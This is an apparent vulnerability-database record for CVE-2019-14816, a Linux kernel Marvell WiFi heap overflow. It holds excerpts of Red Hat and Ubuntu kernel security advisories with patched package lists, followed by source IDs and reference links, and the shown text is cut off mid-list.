CVE-2019-17133 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nSecurity Fix(es):\n\n* kernel: heap overflow in mwifiex_update_vs_ie() function of Marvell WiFi\ndriver (CVE-2019-14816)\n\n* kernel: heap-based buffer overflow in mwifiex_process_country_ie()\nfunction in drivers/net/wireless/marvell/mwifiex/sta_ioctl.c\n(CVE-2019-14895)\n\n* kernel: heap overflow in marvell/mwifiex/tdls.c (CVE-2019-14901)\n\n* kernel: buffer overflow in cfg80211_mgd_wext_giwessid in\nnet/wireless/wext-sme.c (CVE-2019-17133)\n\n* kernel: incomplete fix for race condition between\nmmget_not_zero()/get_task_mm() and core dumping in CVE-2019-11599\n(CVE-2019-14898)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* [Azure][7.8] Include patch \"PCI: hv: Avoid use of hv_pci_dev-\u003epci_slot\nafter freeing it\" (BZ#1766089)\n\n* [Hyper-V][RHEL7.8] When accelerated networking is enabled on RedHat,\nnetwork interface(eth0) moved to new network namespace does not obtain IP\naddress. (BZ#1766093)\n\n* [Azure][RHEL 7.6] hv_vmbus probe pass-through GPU card failed\n(BZ#1766097)\n\n* SMB3: Do not error out on large file transfers if server responds with\nSTATUS_INSUFFICIENT_RESOURCES (BZ#1767621)\n\n* Since RHEL commit 5330f5d09820 high load can cause dm-multipath path\nfailures (BZ#1770113)\n\n* Hard lockup in free_one_page()-\u003e_raw_spin_lock() because sosreport\ncommand is reading from /proc/pagetypeinfo (BZ#1770732)\n\n* patchset for x86/atomic: Fix smp_mb__{before,after}_atomic() (BZ#1772812)\n\n* fix compat statfs64() returning EOVERFLOW for when _FILE_OFFSET_BITS=64\n(BZ#1775678)\n\n* Guest crash after load cpuidle-haltpoll driver (BZ#1776289)\n\n* RHEL 7.7 long I/O stalls with bnx2fc from not masking off scope bits of\nretry delay value (BZ#1776290)\n\n* Multiple \"mv\" processes hung on a gfs2 filesystem (BZ#1777297)\n\n* Moving Egress IP will result in conntrack sessions being DESTROYED\n(BZ#1779564)\n\n* core: backports from upstream (BZ#1780033)\n\n* kernel BUG at arch/powerpc/platforms/pseries/lpar.c:482! (BZ#1780148)\n\n* Race between tty_open() and flush_to_ldisc() using the\ntty_struct-\u003edriver_data field. (BZ#1780163)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nkernel-3.10.0-1062.12.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.12.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1062.12.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nkernel-3.10.0-1062.12.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.12.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1062.12.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nkernel-3.10.0-1062.12.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.12.1.el7.noarch.rpm\n\nppc64:\nbpftool-3.10.0-1062.12.1.el7.ppc64.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debug-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-devel-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-headers-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-tools-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.ppc64.rpm\nperf-3.10.0-1062.12.1.el7.ppc64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\npython-perf-3.10.0-1062.12.1.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\n\nppc64le:\nbpftool-3.10.0-1062.12.1.el7.ppc64le.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debug-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-devel-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-headers-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-tools-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.ppc64le.rpm\nperf-3.10.0-1062.12.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\npython-perf-3.10.0-1062.12.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\n\ns390x:\nbpftool-3.10.0-1062.12.1.el7.s390x.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-debug-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-devel-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-headers-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-kdump-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-1062.12.1.el7.s390x.rpm\nperf-3.10.0-1062.12.1.el7.s390x.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\npython-perf-3.10.0-1062.12.1.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\n\nx86_64:\nbpftool-3.10.0-1062.12.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.ppc64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\n\nppc64le:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkernel-3.10.0-1062.12.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.12.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1062.12.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-14816\nhttps://access.redhat.com/security/cve/CVE-2019-14895\nhttps://access.redhat.com/security/cve/CVE-2019-14898\nhttps://access.redhat.com/security/cve/CVE-2019-14901\nhttps://access.redhat.com/security/cve/CVE-2019-17133\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXjnG/NzjgjWX9erEAQiZpA/+PrziwQc9nitsDyWqtq556llAnWG2YjEK\nkzbq/d3Vp+7i0aaOHXNG9b6XDgR8kPSLnb/2tCUBQKmLeWEptgY6s24mXXkiAHry\nplZ40Xlmca9cjPQCSET7IkQyHlYcUsc9orUT3g1PsZ0uOxPQZ1ivB1utn6nyhbSg\n9Az/e/9ai7R++mv4zJ7UDrDzuGPv5SOtyIcfuUyYdbuZO9OrmFsbWCRwG+cVvXJ6\nq6uXlIpcWx4H7key9SiboU/VSXXPQ0E5vv1A72biDgCXhm2kYWEJXSwlLH2jJJo7\nDfujB4+NSnDVp7Qu0aF/YsEiR9JQfGOOrfuNsmOSdK3Bx3p8LkS4Fd9y3H/fCwjI\nEOoXerSgeGjB5E/DtH24HKu1FB5ZniDJP69itCIONokq6BltVZsQRvZxpXQdmvpz\nhTJIkYqnuvrkv2liCc8Dr7P7EK0SBPhwhmcBMcAcPHE8BbOtEkcGzF2f2/p/CQci\nN0c4UhB2p+eSLq+W4qG4W/ZyyUh2oYdvPjPCrziT1qHOR4ilw9fH9b+jCxmAM7Lh\nwqj3yMR9YhUrEBRUUokA/wjggmI88u6I8uQatbf6Keqj1v1CykMKF3AEC5qfxwGz\nhk0YzSh0YK6DfybzNxcZK/skcp0Ga0vD+El/nXFI0WGXB8LsQiOUBgfp1JyAlXT6\nIwzrfQ6EsXE=\n=mofI\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nEnhancement(s):\n\n* Selective backport: perf: Sync with upstream v4.16 (BZ#1782748)\n\n4. Please note that the RDS protocol is blacklisted in Ubuntu by\ndefault. =========================================================================\nUbuntu Security Notice USN-4163-2\nOctober 23, 2019\n\nlinux-lts-xenial, linux-aws vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 ESM. \n\nIt was discovered that a race condition existed in the ARC EMAC ethernet\ndriver for the Linux kernel, resulting in a use-after-free vulnerability. \nAn attacker could use this to cause a denial of service (system crash). \n(CVE-2016-10906)\n\nIt was discovered that a race condition existed in the Serial Attached SCSI\n(SAS) implementation in the Linux kernel when handling certain error\nconditions. A local attacker could use this to cause a denial of service\n(kernel deadlock). (CVE-2017-18232)\n\nIt was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not\ndid not handle detach operations correctly, leading to a use-after-free\nvulnerability. \n(CVE-2018-21008)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. (CVE-2019-14814,\nCVE-2019-14816)\n\nMatt Delco discovered that the KVM hypervisor implementation in the Linux\nkernel did not properly perform bounds checking when handling coalesced\nMMIO write operations. A local attacker with write access to /dev/kvm could\nuse this to cause a denial of service (system crash). (CVE-2019-14821)\n\nHui Peng and Mathias Payer discovered that the USB audio driver for the\nLinux kernel did not properly validate device meta data. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2019-15117)\n\nHui Peng and Mathias Payer discovered that the USB audio driver for the\nLinux kernel improperly performed recursion while handling device meta\ndata. A physically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2019-15118)\n\nIt was discovered that the Technisat DVB-S/S2 USB device driver in the\nLinux kernel contained a buffer overread. A physically proximate attacker\ncould use this to cause a denial of service (system crash) or possibly\nexpose sensitive information. (CVE-2019-15505)\n\nBrad Spengler discovered that a Spectre mitigation was improperly\nimplemented in the ptrace susbsystem of the Linux kernel. A local attacker\ncould possibly use this to expose sensitive information. (CVE-2019-15902)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n linux-image-4.4.0-1056-aws 4.4.0-1056.60\n linux-image-4.4.0-166-generic 4.4.0-166.195~14.04.1\n linux-image-4.4.0-166-generic-lpae 4.4.0-166.195~14.04.1\n linux-image-4.4.0-166-lowlatency 4.4.0-166.195~14.04.1\n linux-image-4.4.0-166-powerpc-e500mc 4.4.0-166.195~14.04.1\n linux-image-4.4.0-166-powerpc-smp 4.4.0-166.195~14.04.1\n linux-image-4.4.0-166-powerpc64-emb 4.4.0-166.195~14.04.1\n linux-image-4.4.0-166-powerpc64-smp 4.4.0-166.195~14.04.1\n linux-image-aws 4.4.0.1056.57\n linux-image-generic-lpae-lts-xenial 4.4.0.166.145\n linux-image-generic-lts-xenial 4.4.0.166.145\n linux-image-lowlatency-lts-xenial 4.4.0.166.145\n linux-image-powerpc-e500mc-lts-xenial 4.4.0.166.145\n linux-image-powerpc-smp-lts-xenial 4.4.0.166.145\n linux-image-powerpc64-emb-lts-xenial 4.4.0.166.145\n linux-image-powerpc64-smp-lts-xenial 4.4.0.166.145\n linux-image-virtual-lts-xenial 4.4.0.166.145\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. 7) - noarch, x86_64\n\n3. \n\nBug Fix(es):\n\n* patchset for x86/atomic: Fix smp_mb__{before,after}_atomic() [kernel-rt]\n(BZ#1772522)\n\n* kernel-rt: update to the RHEL7.7.z batch#4 source tree (BZ#1780322)\n\n* kvm nx_huge_pages_recovery_ratio=0 is needed to meet KVM-RT low latency\nrequirement (BZ#1781157)\n\n* kernel-rt: hard lockup panic in during execution of CFS bandwidth period\ntimer (BZ#1788057)\n\n4",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14816"
},
{
"db": "PACKETSTORM",
"id": "156020"
},
{
"db": "PACKETSTORM",
"id": "157042"
},
{
"db": "PACKETSTORM",
"id": "156213"
},
{
"db": "PACKETSTORM",
"id": "156603"
},
{
"db": "PACKETSTORM",
"id": "154897"
},
{
"db": "PACKETSTORM",
"id": "154934"
},
{
"db": "PACKETSTORM",
"id": "154946"
},
{
"db": "PACKETSTORM",
"id": "156216"
},
{
"db": "PACKETSTORM",
"id": "154935"
}
],
"trust": 1.71
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2019-14816",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "155212",
"trust": 1.6
},
{
"db": "PACKETSTORM",
"id": "154951",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2019/08/28/1",
"trust": 1.6
},
{
"db": "PACKETSTORM",
"id": "156020",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "154897",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "156216",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "156608",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "157140",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.0415",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.3817",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1172",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4252",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.3570",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4346",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.0790",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3064",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.0766",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.3897",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.3835",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4346.2",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1248",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201908-2176",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "157042",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "156213",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "156603",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154934",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154946",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154935",
"trust": 0.1
}
],
"sources": [
{
"db": "PACKETSTORM",
"id": "156020"
},
{
"db": "PACKETSTORM",
"id": "157042"
},
{
"db": "PACKETSTORM",
"id": "156213"
},
{
"db": "PACKETSTORM",
"id": "156603"
},
{
"db": "PACKETSTORM",
"id": "154897"
},
{
"db": "PACKETSTORM",
"id": "154934"
},
{
"db": "PACKETSTORM",
"id": "154946"
},
{
"db": "PACKETSTORM",
"id": "156216"
},
{
"db": "PACKETSTORM",
"id": "154935"
},
{
"db": "CNNVD",
"id": "CNNVD-201908-2176"
},
{
"db": "NVD",
"id": "CVE-2019-14816"
}
]
},
"id": "VAR-201909-1526",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.30555555
},
"last_update_date": "2026-03-09T20:55:45.836000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Linux kernel Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=97659"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201908-2176"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-122",
"trust": 1.0
},
{
"problemtype": "CWE-787",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14816"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 3.2,
"url": "https://www.openwall.com/lists/oss-security/2019/08/28/1"
},
{
"trust": 2.7,
"url": "https://access.redhat.com/security/cve/cve-2019-14816"
},
{
"trust": 2.3,
"url": "https://access.redhat.com/errata/rhsa-2020:0374"
},
{
"trust": 2.2,
"url": "https://usn.ubuntu.com/4157-1/"
},
{
"trust": 2.2,
"url": "https://access.redhat.com/errata/rhsa-2020:0339"
},
{
"trust": 1.7,
"url": "https://access.redhat.com/errata/rhsa-2020:0174"
},
{
"trust": 1.7,
"url": "https://access.redhat.com/errata/rhsa-2020:0661"
},
{
"trust": 1.7,
"url": "https://access.redhat.com/errata/rhsa-2020:0375"
},
{
"trust": 1.6,
"url": "https://usn.ubuntu.com/4163-2/"
},
{
"trust": 1.6,
"url": "https://usn.ubuntu.com/4162-1/"
},
{
"trust": 1.6,
"url": "https://access.redhat.com/errata/rhsa-2020:0328"
},
{
"trust": 1.6,
"url": "http://packetstormsecurity.com/files/155212/slackware-security-advisory-slackware-14.2-kernel-updates.html"
},
{
"trust": 1.6,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00064.html"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00001.html"
},
{
"trust": 1.6,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/o3rudqjxrjqvghcgr4yzwtq3ecbi7txh/"
},
{
"trust": 1.6,
"url": "https://access.redhat.com/errata/rhsa-2020:0204"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2019/09/msg00025.html"
},
{
"trust": 1.6,
"url": "https://security.netapp.com/advisory/ntap-20191031-0005/"
},
{
"trust": 1.6,
"url": "https://access.redhat.com/errata/rhsa-2020:0664"
},
{
"trust": 1.6,
"url": "https://usn.ubuntu.com/4163-1/"
},
{
"trust": 1.6,
